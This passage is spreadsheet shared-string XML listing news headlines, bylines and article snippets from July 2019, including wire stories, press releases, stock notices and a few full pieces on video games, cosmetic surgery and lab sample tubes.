    <t>Paceman Jhye Richardson is set to return from injury this weekend in Darwin and a hasty departure to England for the Ashes could...</t>
  </si>
  <si>
    <t>PR.com</t>
  </si>
  <si>
    <t>San Francisco, CA, July 30, 2019 --(PR.com)-- Zero, the technology-driven banking app helping consumers avoid overspending, today announced...</t>
  </si>
  <si>
    <t>Ethan James</t>
  </si>
  <si>
    <t>Two wallabies have been shot by arrow in Tasmania, prompting a wildlife sanctuary to offer a reward for information about the "cowardly"...</t>
  </si>
  <si>
    <t>David Keyton</t>
  </si>
  <si>
    <t>Click to expand Replay Video UP NEXT Iran raises uranium enrichment beyond nuclear deal limits Iran announced Sunday it will increase...</t>
  </si>
  <si>
    <t>Oil ticked higher early on Thursday after falling in the previous session as more signs of slowing global growth added to demand concerns,...</t>
  </si>
  <si>
    <t>Brian Wu</t>
  </si>
  <si>
    <t>DNB Asset Management AS lessened its position in Advanced Micro Devices, Inc. (NASDAQ:AMD) by 6.1% in the second quarter, Holdings...</t>
  </si>
  <si>
    <t>Home | News | General | Adesina tells African business community to put capital on the line for the young By Jimoh Babatunde Global...</t>
  </si>
  <si>
    <t>Decision on jurisdiction over the Coastal GasLink Pipeline Project has been issued CALGARY, July 26, 2019 /CNW/ - The National Energy Board...</t>
  </si>
  <si>
    <t>The Food and Drug Administration has approved the key ingredient in the plant-based burger of Beyond Meat's rival Impossible Foods.</t>
  </si>
  <si>
    <t>DUBAI, United Arab Emirates (AP) — Yemen's internationally-recognized government says the Houthi rebels were behind a strike on a market...</t>
  </si>
  <si>
    <t>by Antonia O’Flaherty</t>
  </si>
  <si>
    <t>A DIET full of vitamin A can reduce your risk of skin cancer, new research has found. Queensland has the highest rate of skin cancer in...</t>
  </si>
  <si>
    <t>OSLO, Norway, July 22, 2019 (GLOBE NEWSWIRE) -- Opera Limited (Nasdaq: OPRA) (“Opera”), one of the world’s leading browser providers and...</t>
  </si>
  <si>
    <t>Converting PDF files into HTML5 flipbooks is now a lot easier with the PDF to HTML5 platform introduced by FlipHTML5. Hong Kong, China --...</t>
  </si>
  <si>
    <t>The FTC's three Republican commissioners said the settlement holds Facebook's CEO more accountable than a court would.</t>
  </si>
  <si>
    <t>Piper Jaffray Companies (NYSE: PJC) has released its most recent financial results. The complete earnings release can be found on the...</t>
  </si>
  <si>
    <t>ELLIOT SPAGAT Associated Press</t>
  </si>
  <si>
    <t>Many of the kids are under 5</t>
  </si>
  <si>
    <t>from Jul, Tue 30 2019 - 9:00 AM</t>
  </si>
  <si>
    <t>Darius Johnson</t>
  </si>
  <si>
    <t>MUNCIE, Ind. -- Police in Muncie are finding a new way to increase community policing and they're starting with kids. On Saturday, the...</t>
  </si>
  <si>
    <t>By Associated Press</t>
  </si>
  <si>
    <t>RENO, Nev. (AP) — A 64-year-old Utah man has been extradited to Reno to face a murder charge in the April death of the ex-husband of a...</t>
  </si>
  <si>
    <t>CHICAGO, July 23, 2019 /PRNewswire/ -- Wilson Dow Group, a creative production agency dedicated to uniting and activating audiences through...</t>
  </si>
  <si>
    <t>Travelweek Group</t>
  </si>
  <si>
    <t>TORONTO — Jody Power of CWT Harveys Travel has been named the winner of Air Canada’s Melbourne contest. Based in St. John’s, NL, Power has...</t>
  </si>
  <si>
    <t>TheNewswire.com - RSS (Media)</t>
  </si>
  <si>
    <t>Tickers: XTSX:IOT Tags: #Biotechnology, #Mining, #Healthcare Edmonton - TheNewswire - July 26, 2019. Innovotech Inc. (TSXV:IOT), is pleased...</t>
  </si>
  <si>
    <t>Martelle will grow team and leverage connections to strengthen Barcoding-Canada’s presence and offerings Barcoding, Inc., has hired...</t>
  </si>
  <si>
    <t>STEPHEN WRIGHT and KARIN LAUB Associated Press</t>
  </si>
  <si>
    <t>JAKARTA, Indonesia (AP) — Indonesian President Joko Widodo said in an interview Friday that he will push ahead with sweeping and...</t>
  </si>
  <si>
    <t>Mark Quinlivan</t>
  </si>
  <si>
    <t>A six-year-old boy nearly lost his tongue after getting it stuck in a drink bottle purchased from a UK supermarket. The Lancaster...</t>
  </si>
  <si>
    <t>James Torrez</t>
  </si>
  <si>
    <t>According to the 2018 Farm Bill, which legalized hemp and allowed states to make their own rules, hemp is identified as a substance with...</t>
  </si>
  <si>
    <t>Manchester United manager Ole Gunnar Solskjaer has made it clear to the club's executive vice-chairman Ed Woodward that he wants to sign...</t>
  </si>
  <si>
    <t>The Co-Op Survival Game Challenges Players to Prevent Ragnarok Have you ever lost yourself in a dream where you round up a few of your closest Viking buddies and battling the Giants of Jotunheim? My guess is yes – who hasn’t? Thankfully, we are all in luck as Norsfell’s Tribes of Midgard is opening a beta version this weekend. Tribes of Midgard is a co-op survival game pitting groups of ten against ferocious giants. Players work to prevent the giants from reaching Asgard, where they intend to overthrow the Norse gods. Specifically, the giants aim to destroy the Seed of Yggdrasil, “the last bastion that protects the Gods from other realms.” The website describes the game as “a cooperative survival game in which up to 10 players defend their village against Giants during Ragnarök.” It continues “Set in a procedurally generated world full of dark creatures, hidden treasures and abundant materials to be uncovered, you play as a Viking clan living in a village that houses the Seed of Yggdrasil; a seed that holds the promise of everlasting life.” “With the Gods nowhere to be found, you and your tribe will need to explore the wilderness to craft new weapons and be prepared to protect the sacred centre of your village from the grim shadows that prey upon its power. Together, you will seek out each Giant and stop them from destroying your home.” The beta for Tribes of Midgard is live now and runs until midnight on Sunday, July 28. It is a beta version, which means there is likely going to be some glitches. Developers are suggesting that if you run into problems to reduce the maximum number of players from ten to six. They also warn the game may crash if you leave a world to join another without exiting. The open beta is available for download here . You should also check out our preview for Fifa 20! Let us know what you think of the beta in the comments section below! SOURCE</t>
  </si>
  <si>
    <t>SIOUX CENTER, Iowa, July 23, 2019 /PRNewswire-PRWeb/ -- Link Mfg., Ltd., the leader in specialty-engineered suspensions, formally...</t>
  </si>
  <si>
    <t>Pia Sinha</t>
  </si>
  <si>
    <t>The flooring brand’s new design collection helps elevate interior spaces, while also supporting the Property Industry Foundation’s...</t>
  </si>
  <si>
    <t>VanEck announced today its distributions per share for its VanEck Vectors® exchange-traded funds. The following dates apply to distribution...</t>
  </si>
  <si>
    <t>Simmons Energy | A Division of Piper JaffraySM (“Simmons”) has named Spencer Rippstein, Andrew Schroeder and Sanjiv Shah as co-heads of...</t>
  </si>
  <si>
    <t>ACCESSWIRE30 Jul 2019</t>
  </si>
  <si>
    <t>SANDUSKY, OH / ACCESSWIRE / July 30, 2019 / PAO Group, Inc. (OTC Pink: PAOG) ("PAO Group" or the "Company") is pleased to announce that it...</t>
  </si>
  <si>
    <t>Following the success last year, the Healthcare+ Expo sees a rapid growth in size and significance of procurement, networking and...</t>
  </si>
  <si>
    <t>Nicholas Stuart</t>
  </si>
  <si>
    <t>Scott Morrison has nothing - yet everything - in common with Boris Johnson. Morrison's descended from a convict. Johnson's descended (via...</t>
  </si>
  <si>
    <t>ATLANTIC CITY, N.J. (AP) — The Miss America pageant is leaving one casino town for another. The Miss America Organization says this year's...</t>
  </si>
  <si>
    <t>IRVING, Texas, July 31, 2019 /PRNewswire/ -- Caris Life Sciences®, a leading innovator in molecular science focused on fulfilling the...</t>
  </si>
  <si>
    <t>SAN MATEO, Calif. - July 25, 2019 - PRLog -- On Saturday, August 3rd, hundreds of Bay Area children in grades K-12 will receive new...</t>
  </si>
  <si>
    <t>There are some pretty weird crafts on the internet, like amateur taxidermy, making flowers from duct tape, and this … please watch this...</t>
  </si>
  <si>
    <t>MINNEAPOLIS (WCCO) – Authorities say a woman is dead and a man is in custody after police in Paynesville responded to a call Tuesday of...</t>
  </si>
  <si>
    <t>Elija Maina</t>
  </si>
  <si>
    <t>Cardinal Capital Management trimmed its position in shares of Biogen Inc (NASDAQ:BIIB) by 1.0% in the second quarter, according to the...</t>
  </si>
  <si>
    <t>With Apple's earnings report on the horizon, TradingAnalysis.com founder Todd Gordon is putting on a bullish trade.</t>
  </si>
  <si>
    <t>SiteOne Landscape Supply, Inc. (the “Company” or “SiteOne”) (NYSE: SITE) announced earnings for its second quarter ended June 30, 2019...</t>
  </si>
  <si>
    <t>TOKYO (Reuters) - Japan’s Sony Corp (6758.T) surprised the market by reporting on Tuesday a record first-quarter operating profit despite...</t>
  </si>
  <si>
    <t>Dublin, July 22, 2019 (GLOBE NEWSWIRE) -- The "Tantalum Electric Capacitor Market - Forecasts from 2019 to 2024" report has been...</t>
  </si>
  <si>
    <t>By Jennifer Drysdale‍</t>
  </si>
  <si>
    <t>Hannah Brown has a tough decision ahead of her. According to Bachelorettehost Chris Harrison, next week's season finale of the series...</t>
  </si>
  <si>
    <t>The global capillary blood collection devices market size is expected to reach USD 1.75 billion by 2025, according to a new report by Grand...</t>
  </si>
  <si>
    <t>Glancy Prongay &amp; Murray LLP (“GPM”) announces the continuation of its investigation on behalf of Cadence Bancorporation (“Cadence” or the...</t>
  </si>
  <si>
    <t>Mark Hub</t>
  </si>
  <si>
    <t>Tweet Share 0 +1 LinkedIn 0 Albany, US, 2019-Jul-30 — /EPR Network/ —The purpose of this MRH research study titled Global Intensive...</t>
  </si>
  <si>
    <t>July 29, 2019 - /PressAdvantage/ - Brierfield, England based Hajjah Naziha Charity (HNCO) recently issued a public reminder encouraging...</t>
  </si>
  <si>
    <t>OCC, the world's largest equity derivatives clearing organization, announced today that Susan O’Flynn, Managing Director and Global Head of...</t>
  </si>
  <si>
    <t>Chris Clegg South Peace News What started as a friendly card game between pals at the High Prairie Youth Assessment Centre quickly turned...</t>
  </si>
  <si>
    <t>Throtle, a leading identity resolution and data onboarding firm, announced its partnership with BritePool, a provider of consumer identity...</t>
  </si>
  <si>
    <t>ST. LOUIS (AP) — A St. Louis man says a box that had been in his mother’s freezer for decades contained the mummified remains of a newborn...</t>
  </si>
  <si>
    <t>The Beard Marine Group is famed for offering the most efficient and advanced marine equipment and supplies. Ft. Lauderdale, FL --...</t>
  </si>
  <si>
    <t>MIAMI, July 29, 2019 /PRNewswire/ -- Hemisphere Media Group, Inc. (NASDAQ: HMTV) ("Hemisphere" or the "Company"), the only publicly traded...</t>
  </si>
  <si>
    <t>WENN - World Entertainment News Network</t>
  </si>
  <si>
    <t>William Golding’s classic novel Lord of the Flies is set for a gender-bending twist on the big screen. Oscar-nominated filmmaker Luca...</t>
  </si>
  <si>
    <t>ABMN Staff</t>
  </si>
  <si>
    <t>Commonwealth Equity Services LLC lifted its position in shares of Prudential Financial Inc (NYSE:PRU) by 8.0% in the second quarter,...</t>
  </si>
  <si>
    <t>GREAT NECK, N.Y., July 24, 2019 (GLOBE NEWSWIRE) -- BRT APARTMENTS CORP. (NYSE:BRT), a growing multi-family real estate investment trust...</t>
  </si>
  <si>
    <t>A woman has “married” her pet golden retriever Logan in a live ceremony on daytime TV show This Morning. Elizabeth Hoad took part in a...</t>
  </si>
  <si>
    <t>North America Computer Printers Market Report (2014-2024) - Market Size, Share, Price, Trend and Forecast Abstract: The North America...</t>
  </si>
  <si>
    <t>By Celebretainment</t>
  </si>
  <si>
    <t>Nikki Sixx and Courtney Bingham have welcomed a baby girl.</t>
  </si>
  <si>
    <t>SOURCE: PayPal DESCRIPTION: Many of you likely know Jim Cramer as the host of CNBC’s “Mad Money,” through his best-selling books, or as...</t>
  </si>
  <si>
    <t>NEW YORK, July 29, 2019 (GLOBE NEWSWIRE) -- Bragar Eagel &amp; Squire, P.C. announces that a class action lawsuit has been filed in the...</t>
  </si>
  <si>
    <t>Hanz Christensen</t>
  </si>
  <si>
    <t>Citigroup set a $317.00 price objective on Mastercard (NYSE:MA) in a research note published on Friday, TipRanks reports. The brokerage...</t>
  </si>
  <si>
    <t>Sara Patterson</t>
  </si>
  <si>
    <t>The price of the pound is getting worse in the Forex market. In yesterday's analysis, we confirmed that the GBP/USD is preparing for...</t>
  </si>
  <si>
    <t>Diamond S Shipping Inc. (NYSE:DSSI) (the “Company”) announced today that the Company plans to release second quarter 2019 earnings before...</t>
  </si>
  <si>
    <t>Jose Buchanan</t>
  </si>
  <si>
    <t>The stock of COMEPAY INC (OTCMKTS:CMPY) registered a decrease of 44% in short interest. CMPY’s total short interest was 1,400 shares in...</t>
  </si>
  <si>
    <t>OAKLAND, Calif., July 23, 2019 /PRNewswire/ -- UNITED STATES DISTRICT COURT NORTHERN DISTRICT OF CALIFORNIA OAKLAND DIVISION SUMMARY NOTICE...</t>
  </si>
  <si>
    <t>Tess Egginton</t>
  </si>
  <si>
    <t>British car manufacturing output fell by more than a fifth in the first half of 2019.</t>
  </si>
  <si>
    <t>Brad Hunter  More from Brad Hunter</t>
  </si>
  <si>
    <t>For Laura-Alicia Summers, plastic surgery is no pain in the ass. The British babe has had three Brazilian bum lifts, eight boob jobs and seven nose jobs in her quest for perfection. But getting that face and body doesn’t come cheap: Summers admits to spending a whopping $820,000 on more than 50 procedures over the last 17 years. “Cosmetic surgery is like a drug. It’s very addictive, but in a good way,” she told the Manchester Evening News. “It’s not for everyone, but it has enhanced my life in every way. “People change their cars every two years, why not change their bodies too? I have probably had over half a million pounds worth of surgery. I’ve had 50 operations, but I’ve always been open and honest about it.” She said that her quest for perfection comes from being bullied when she was a child. “People said I was ugly, I was overweight and wore glasses and all I ever wanted was to look like Barbie,” Summers told the Evening News. “I always dreamed of being a Victoria Secret model like the ones in the magazines. I thought they always looked happy, and I wanted to be happy. I had no confidence and was really unhappy, didn’t have a lot of friends.” When she was 18, her father gave her a choice: a new car or a boob job. She said, thanks for the mammaries! And the Brit reality TV star said she’s not ready to hang up the silicone just yet. But it isn’t all glory. She appeared on a British morning show last year and had to be interviewed standing up because she’d just had one of her bum lifts. Summers couldn’t sit down. “Fashion changes, and so does plastic surgery,” she said. “It was once all about big boobs, then big lips, and now it’s all about bums. I think the main reason that bum lifts are so popular is because it is a more attainable size.”</t>
  </si>
  <si>
    <t>Racingandsports.com</t>
  </si>
  <si>
    <t>2019 Winter Challenge: Tips And Race Preview Chris Waller could well dominate the 2019 Winter Challenge at Rosehill on Saturday with Seaway...</t>
  </si>
  <si>
    <t>HAMILTON, Bermuda--(BUSINESS WIRE)--Jul 23, 2019-- The Bank of N.T. Butterfield &amp; Son Limited ("Butterfield" or the "Bank") (BSX:...</t>
  </si>
  <si>
    <t>MOSCOW (AP) — The young woman screamed as her boyfriend lay atop her, absorbing the blows of a helmeted riot policeman. It’s one of the...</t>
  </si>
  <si>
    <t>SAO PAULO, July 29 (Reuters) - Brazil's largest lender, Itaú Unibanco Holding SA, said on Monday it has closed nearly 200 brick-and-mortar...</t>
  </si>
  <si>
    <t>BOULDER, Colo., July 22, 2019 /PRNewswire/ -- Techstars, the worldwide network that helps entrepreneurs succeed, today announced the launch...</t>
  </si>
  <si>
    <t>More than 35 million trees have been planted in Ethiopia in just 12 hours against the country's prime minister's deforestation. The...</t>
  </si>
  <si>
    <t>Funeral services for Walter Leo Fitzenreiter Jr., 93, of Hornbeck, were held July 27 at the Hornbeck United Methodist Church with the...</t>
  </si>
  <si>
    <t>LOS ANGELES, July 30, 2019 /PRNewswire/ -- Launched April 19th, to kick off the summer, founder Aja Smith is proud to introduce Forever...</t>
  </si>
  <si>
    <t>SKOPJE, North Macedonia (AP) — Police in North Macedonia say they have discovered 21 migrants from Pakistan, Iraq and Syria left in the...</t>
  </si>
  <si>
    <t>Radha Arora ;DNA</t>
  </si>
  <si>
    <t>The retail industry landscape is revolutionizing at breakneck pace with fast-evolving preferences of customers. Digital disruptions are...</t>
  </si>
  <si>
    <t>By Dan Feldman</t>
  </si>
  <si>
    <t>Kevin Durant called Kendrick Perkins his favorite teammate of all-time. Perkins was out ahead on Durant signing with the Nets. Perkins,...</t>
  </si>
  <si>
    <t>Rigrodsky &amp; Long, P.A.</t>
  </si>
  <si>
    <t>WILMINGTON, Del., July 22, 2019 (GLOBE NEWSWIRE) -- Rigrodsky &amp; Long, P.A. announces that it is investigating: United Financial...</t>
  </si>
  <si>
    <t>DETROIT (AP) — The second set of Democratic presidential debates will be a last chance for some 2020 candidates to be considered serious...</t>
  </si>
  <si>
    <t>SCOTTSDALE, Ariz., July 30, 2019 /PRNewswire/ -- R3 Stem Cell, LLC (R3) today announced that it will be offering a 2-day comprehensive...</t>
  </si>
  <si>
    <t>Atlanta, GA - (NewMediaWire) - July 30, 2019 - Findit, Inc. (OTC PINK: FDIT), a Nevada corporation, recently procured two CBD topical...</t>
  </si>
  <si>
    <t>By Swati Pandey SYDNEY (Reuters) - Asian shares were cautious on Thursday, shrugging off a tech-fuelled rally on Wall Street while the...</t>
  </si>
  <si>
    <t>WARREN, New Jersey and BANGALORE, India, July 31, 2019 /PRNewswire/ -- Mindtree, a global technology services and digital transformation...</t>
  </si>
  <si>
    <t>HYUNG-JIN KIM Associated Press</t>
  </si>
  <si>
    <t>SEOUL, South Korea (AP) — South Korean fired warning shots after a Russian military plane violated South Korea's airspace on Tuesday, Seoul...</t>
  </si>
  <si>
    <t>Originally posted on https://www.innovativeflare.com/12-easy-ways-to-get-more-local-business-traffic/ According to this research by Google,...</t>
  </si>
  <si>
    <t>SUNDLAN PARK, N.M. -- Bright pink steel seesaws are bringing children together on both sides of the United States-Mexico border. The...</t>
  </si>
  <si>
    <t>Corning Observer</t>
  </si>
  <si>
    <t>FELONY ARRESTS Robert Ray Cooper, 26, of Red Bluff was arrested by a Tehama County probation officer July 22 on Walnut Street in Red Bluff...</t>
  </si>
  <si>
    <t>North Queensland assistant coach Josh Hannay hopes Michael Morgan's return is the finishing touch they need in launching an all or nothing...</t>
  </si>
  <si>
    <t>Jul 23, 2019 (HTF Market Intelligence via COMTEX News Network) -- HTF MI recently introduced new title on "Global E-passport and E-visa...</t>
  </si>
  <si>
    <t>DALLAS and SEOUL, South Korea, July 23, 2019 /PRNewswire/ -- Korea Gas Corporation (KOGAS) and Energy Capital Vietnam (ECV) have entered...</t>
  </si>
  <si>
    <t>Circle Expands to Bermuda to Offer New Services to Non-US Clients Circle has launched a new subsidiary in Bermuda to serve non-American...</t>
  </si>
  <si>
    <t>Newcastle Newsroom</t>
  </si>
  <si>
    <t>Check out the designs!</t>
  </si>
  <si>
    <t>By Easton Contributor</t>
  </si>
  <si>
    <t>Looking further at shares of Pico Holdings Inc (PICO), we have seen that the Ultimate Oscillator reading is currently below 40. Traders...</t>
  </si>
  <si>
    <t>Officials to look into whether Facebook, Google, Amazon and Apple are unlawfully limiting competition</t>
  </si>
  <si>
    <t>The financial and operational information contained in this press release is based on unaudited consolidated condensed interim financial...</t>
  </si>
  <si>
    <t>Press Trust of India</t>
  </si>
  <si>
    <t>The Uttarakhand Congress on Thursday asked its leaders and office bearers to sort out their differences within the party instead of making...</t>
  </si>
  <si>
    <t>RIYADH, Saudi Arabia (AP) — Saudi King Salman’s elder half-brother, who was the tenth son of the country’s founding monarch, has died at...</t>
  </si>
  <si>
    <t>Latest Press Releases from Newswire.com</t>
  </si>
  <si>
    <t>The global payment processing solutions market is expected to grow from USD 39.3 billion in 2019 to USD 64.5 billion by 2024, at a...</t>
  </si>
  <si>
    <t>Theresa Schmidt</t>
  </si>
  <si>
    <t>LAKE CHARLES, La. (KPLC) - A big announcement from SOWELA Technical Community College where they are getting a million-dollar donation and...</t>
  </si>
  <si>
    <t>DUBLIN --(BUSINESS WIRE) The "Global Fetal and Neonatal Equipment Market: Drivers, Restraints, Opportunities, Trends, and Forecast up to...</t>
  </si>
  <si>
    <t>SINGAPORE, July 30, 2019 /PRNewswire/ -- Recently, the most influential events in the entire industry are Facebook Libra projects. The move...</t>
  </si>
  <si>
    <t>Jack  Kramer, Patch Staff</t>
  </si>
  <si>
    <t>Historic, stately and elegant describe this cornerstone house for sale located near the Guilford Green</t>
  </si>
  <si>
    <t>Originally broadcast at San Diego Comic Con a few days ago, a short teaser trailer introducing players to yet another member of Death Stranding’s enigmatic cast, Heartman, has just been released on the official PlayStation YouTube channel. At only two-minutes long, it’s not particularly informative. However, by combining Kojima’s previous comments on the character, the trailer itself, and the synopsis that accompanies it, we can at least begin to understand how Heartman fits into the wider story. Who is Heartman? Played by Danish writer/director/actor and personal friend of Hideo Kojima, Nicolas Winding Refn (Neon Demon, Drive), Heartman is a member of the mysterious group known as Bridges. The same group to which protagonist Sam belongs. During the trailer, we discover that Heartman lives with a rather unusual condition which causes him to literally die every 21 minutes, before being revived some three minutes later by the automatic defibrillator attached to his chest. Admittedly, that’s roughly twice as long as the life expectancy of the average Sekiro player. But still, given that his overarching goal is to find the family he lost on the “other side” following the titular death stranding event, this endless cycle of death and rebirth is inconvenient, to say the least. That’s all we know about Heartman so far, unfortunately. Nevertheless, it’s easy to see how he fits within the wider themes of the game: specifically, the literal and figurative connections that bind us. You can check out the trailer for yourself below Death Stranding Edges Ever Closer The first game to be developed by legendary Metal Gear auteur Hideo Kojima since his acrimonious departure from Konami, we’re now within just a few short months of Death Stranding’s release. That’s the 8th November 2019, in case you’d forgotten. Even so, we don’t really know what to expect. Although, like everyone else who’s been following Death Stranding since it was first unveiled back at E3 2016, we have a few working theories of our own. Stay tuned to PSU over the coming months for all the latest information on Death Stranding. Source: PlayStation</t>
  </si>
  <si>
    <t>PABLO GORONDI, Associated Press</t>
  </si>
  <si>
    <t>BUDAPEST, Hungary — The Ukrainian captain of a cruise ship involved in a crash on the Danube River that killed 28 people was back in police...</t>
  </si>
  <si>
    <t>Maxx Chatsko, Motley Fool</t>
  </si>
  <si>
    <t>Shares of Marinus Pharmaceuticals (NASDAQ: MRNS) fell over 70% today after the company announced results from an important midstage...</t>
  </si>
  <si>
    <t>Nicolas Maduro, the Venezuelan president, may be more crypto-savvy than expected. After attempting the stunt with a national oil-backed...</t>
  </si>
  <si>
    <t>James Joyce</t>
  </si>
  <si>
    <t>Voice of Real Australia is a regular newsletter from Australian Community Media, which has journalists in every state and territory. Sign...</t>
  </si>
  <si>
    <t>By Jennifer Bolton, CORRESPONDENT</t>
  </si>
  <si>
    <t>Paul Schrader says he gets emotional reflecting that the city of Friendswood has named a park area near Lake Friendswood after him. But he...</t>
  </si>
  <si>
    <t>One antitrust expert believes the DOJ investigation may prompt regulators to interpret U.S. competition law in new ways.</t>
  </si>
  <si>
    <t>Dublin, July 29, 2019 (GLOBE NEWSWIRE) -- The "Solar Cable Systems Market by Application and Geography - Global Forecast 2019-2023"...</t>
  </si>
  <si>
    <t>By Andrew Ravens</t>
  </si>
  <si>
    <t>CM Punk Addresses AEW Rumors Wrestling News and Rumors</t>
  </si>
  <si>
    <t>An Australian man, whose wife and son are trapped in far western China, is pleading with the federal government to fast-track their return...</t>
  </si>
  <si>
    <t>NEW YORK--(BUSINESS WIRE)--Bristol-Myers Squibb Company (NYSE:BMY) today reported results for the second quarter of 2019, which were...</t>
  </si>
  <si>
    <t>KINGSTON, Pa. (AP) — The Latest on a Pennsylvania school district's letter to parents about overdue school lunch bills (all times local):...</t>
  </si>
  <si>
    <t>Iran's state broadcaster has aired a video showing for the first time the 23-member crew of the British-flagged ship seized by Iran. In the...</t>
  </si>
  <si>
    <t>Redazione ANSA</t>
  </si>
  <si>
    <t>(ANSA) - Bibbiano, July 23 - Deputy Premier Matteo Salvini said Tuesday he would not "find peace" until all seven of the children taken...</t>
  </si>
  <si>
    <t>NEW YORK--(BUSINESS WIRE)--Jul 24, 2019-- KKR Income Opportunities Fund (the “Fund”) (NYSE: KIO) today announced its monthly distributions...</t>
  </si>
  <si>
    <t>MURFREESBORO, Ark. (KATV) — Josh Lanik, a 36-year-old school teacher from Hebron, Nebraska, recently visited the Crater of Diamonds State...</t>
  </si>
  <si>
    <t>Yvette Gomez</t>
  </si>
  <si>
    <t>Hudson Capital Management LLC grew its stake in shares of SPDR S&amp;P Emerging Asia Pacific ETF (NYSEARCA:GMF) by 8.0% in the second quarter,...</t>
  </si>
  <si>
    <t>PRNewswire</t>
  </si>
  <si>
    <t>Global news agency announces new collaboration with the National Election Pool (NEP), a consortium comprised of ABC News, CBS News, CNN and...</t>
  </si>
  <si>
    <t>LOUISVILLE, Ky. (AP) — Republican Sen. Rand Paul says he'd help pay for a minority congresswoman to return to the country she fled as a...</t>
  </si>
  <si>
    <t>Brenna Harrington</t>
  </si>
  <si>
    <t>More than doubling its distribution channels in the U.S. in just six months, Organic Initiative (Oi), producers of 100 percent certified...</t>
  </si>
  <si>
    <t>Rob Shaw</t>
  </si>
  <si>
    <t>He may have arrived at the position in unorthodox and controversial circumstances, but Tim Paine now thinks he is "the luckiest man in...</t>
  </si>
  <si>
    <t>Former Red Sox slugger David Ortiz out of hospital following 3 surgeries after being shot at bar in Dominican Republic</t>
  </si>
  <si>
    <t>Market News Video</t>
  </si>
  <si>
    <t>There's an old saying on Wall Street about insider buying: there are many possible reasons to sell a stock, but only one reason to buy....</t>
  </si>
  <si>
    <t>Ammoland</t>
  </si>
  <si>
    <t>By Elizabeth McGuigan</t>
  </si>
  <si>
    <t>MAYS LANDING, N.J. (AP) — State police say a woman who was ejected from a moving boat has died after she was struck by the propeller. And...</t>
  </si>
  <si>
    <t>Cora Scott</t>
  </si>
  <si>
    <t>Investors sentiment increased to 1.13 in 2019 Q1. Its up 0.15, from 0.98 in 2018Q4. It improved, as 38 investors sold DLR shares while 172...</t>
  </si>
  <si>
    <t>EGAN BARNAL is virtually guaranteed to win the Tour de France after coming through stage 20 with a comfortable lead, with last year’s...</t>
  </si>
  <si>
    <t>More charges and more defendants could be added to the federal case against R. Kelly in Chicago that currently alleges child pornography...</t>
  </si>
  <si>
    <t>“LyondellBasell Industries Holdings BV Was The Largest Company In Plastic Material And Resins Market, Global Opportunities And...</t>
  </si>
  <si>
    <t>Linda Flegge</t>
  </si>
  <si>
    <t>Del Taco Restaurants (NASDAQ:TACO) updated its FY19 earnings guidance on Monday. The company provided EPS guidance of ~$0.47-0.52 for the...</t>
  </si>
  <si>
    <t>CALGARY, July 23, 2019 /CNW/ - WestJet Airlines Ltd. (TSX: WJA) ("WestJet") today announced that at a special meeting held today (the...</t>
  </si>
  <si>
    <t>LONDON, July 30, 2019 (GLOBE NEWSWIRE) -- Hutchison China MediTech Limited (“Chi-Med”) (AIM/Nasdaq: HCM) today announces its unaudited...</t>
  </si>
  <si>
    <t>Cannabis stocks were mostly lower on Tuesday, as speakers addressed a Senate hearing on cannabis and banking that industry insiders are...</t>
  </si>
  <si>
    <t>WASHINGTON (AP) — President Donald Trump plans to focus on Medicare when he visits a Central Florida retirement community next week.</t>
  </si>
  <si>
    <t>DUBAI, United Arab Emirates, July 27, 2019 /PRNewswire-PRWeb/ -- The Dubai Diamond Exchange (DDE), a subsidiary of DMCC, the world's...</t>
  </si>
  <si>
    <t>Washington, DC, July 25, 2019 --(PR.com)-- The Smoke-Free Alternatives Trade Association (SFATA), the Canadian Vaping Association (CVA) and...</t>
  </si>
  <si>
    <t>NEWARK, N.J. and NEW YORK and PHILADELPHIA, July 22, 2019 /PRNewswire/ -- Whetstone Technologies announces the general availability of the...</t>
  </si>
  <si>
    <t>U.S. commodities trader Bunge Ltd and British energy company BP Plc said on Monday they will merge their Brazilian sugar and ethanol...</t>
  </si>
  <si>
    <t>One dose of human papillomavirus (HPV) vaccine has comparable effectiveness to two or three doses for preventing cervical pre-cancer, a new...</t>
  </si>
  <si>
    <t>Denise Bennett</t>
  </si>
  <si>
    <t>Kylie Jenner and her boyfriend Travis Scott are in hot water after her most recent Instagram post. In the photo, Jenner and Scott appear to...</t>
  </si>
  <si>
    <t>/PRNewswire/ -- Brooks Life Sciences expanded the FluidX Next-Gen Sample Tube range, providing flexibility through the widest range of coded sample tubes available in the industry. Comprising of 18 sample tubes - you have the flexibility of choosing a tube that fits your workflow, not changing your workflow to fit the tube. What is a FluidX Next-Gen Sample Tube? The FluidX Next-Gen Sample Tube range benefits from nearly 20 years of experience manufacturing and supplying coded tubes to biobanks, compound management groups, basic research labs, genomic labs and more. The Next-Generation manufacturing technique is used to integrate 2 resin colors into the same tube enabling high-resolution coding and reliable readability. With several industry-leading key benefits, FluidX Next-Gen Sample Tubes help protect sample integrity and support lab efficiency. The key benefits are: No detectable leachables or extractables High quality manufacturing with enhanced testing Flexibility of true working volume with a broad range of tubes Traceability with multiple coding options (Tri-coded, Dual-coded, 2D-coded, 1D-code, Human Readable) Secure sealing (external thread, internal thread, septum, heat seal) Permanently laser etched to ensure codes are not lost/damaged High contrast for reliable readability, compatible with a broad range of readers especially the Perception HD from Brooks Life Sciences Evelyn Stevenson, FluidX Range Consumables Product Manager said; "We're very proud of our expanded range of FluidX Next-Gen Sample Tubes. Not only can we offer customers the widest range available, but we also feature industry leading benefits to protect sample integrity and promote lab efficiency across a range of applications". Further, Brooks Life Sciences is also pleased to announce the rationalized naming structure for the FluidX Sample Tubes. This can be found in the glossary of the new Sample Tube Consumables and Instruments catalogue. To learn more about the FluidX Next-Gen Sample Tube range and to order a new sample pack or download the new catalogue visit www.brookslifesciences.com. If you would like to speak directly to us, please contact: Mike Thurogood - Marketing Director, Brooks Life Sciences Mike.Thurogood@brooks.com Evelyn Stevenson - Product Manager, Brooks Life Sciences Evelyn.Stevenson@brooks.com SOURCE Brooks Life Sciences</t>
  </si>
  <si>
    <t>Ciner Resources LP (the "Partnership") (NYSE: CINR) announced that the board of directors of its general partner approved today its...</t>
  </si>
  <si>
    <t>Stephanie Nelson, Neighbor</t>
  </si>
  <si>
    <t>Please share or donate if you can, any little bit helps. Thank you</t>
  </si>
  <si>
    <t>Lauren Steadman</t>
  </si>
  <si>
    <t>BidaskClub lowered shares of Henry Schein (NASDAQ:HSIC) from a hold rating to a sell rating in a research note issued to investors on...</t>
  </si>
  <si>
    <t>BILLINGS, Mont., July 31, 2019 /PRNewswire-PRWeb/ -- WebBuy, which introduced the nation's first fully integrated car-buying application to...</t>
  </si>
  <si>
    <t>NEW YORK--(BUSINESS WIRE)--Jul 30, 2019-- Sermo, the leading global social platform for physicians and largest health care professional...</t>
  </si>
  <si>
